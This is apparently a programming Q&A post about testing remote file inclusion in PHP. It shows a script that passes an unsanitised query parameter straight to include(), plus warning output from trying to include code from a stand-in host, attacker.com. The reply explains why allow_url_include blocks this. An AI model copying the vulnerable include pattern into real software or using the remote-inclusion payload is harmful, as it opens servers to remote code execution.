无法使用PHP包含文件

Question

I have an issue. I was testing how remote file inclusion injection and tried to include the file from URL query string using PHP. But here I am getting some warning messages. I am explaining my code below.

<?php
$file = $_GET['file'];
include($file);
?>

I am getting the following messages.

Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(http://attacker.com/evil.php): failed to open stream: no suitable wrapper could be found in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(): Failed opening 'http://attacker.com/evil.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/test/remote.php on line 3

Here I am calling remote file like this http://localhost/test/remote.php?file=http://kooleedback.com/about.php . Here I need to know how it can be successfully included and also how it can be prevented.

Answer 1

Your server has the allow_url_include option disabled. This means you can only access local files with include() , not external URLs.

In general it doesn't make sense to use include() with a remote .php URL. When you request a .php file from a server, it doesn't return the source code, it executes the script and returns the output. But include() needs to get PHP code, which it executes as if it were in the including script.

If you want to get that remote data you should use file_get_contents($file) , not include($file) .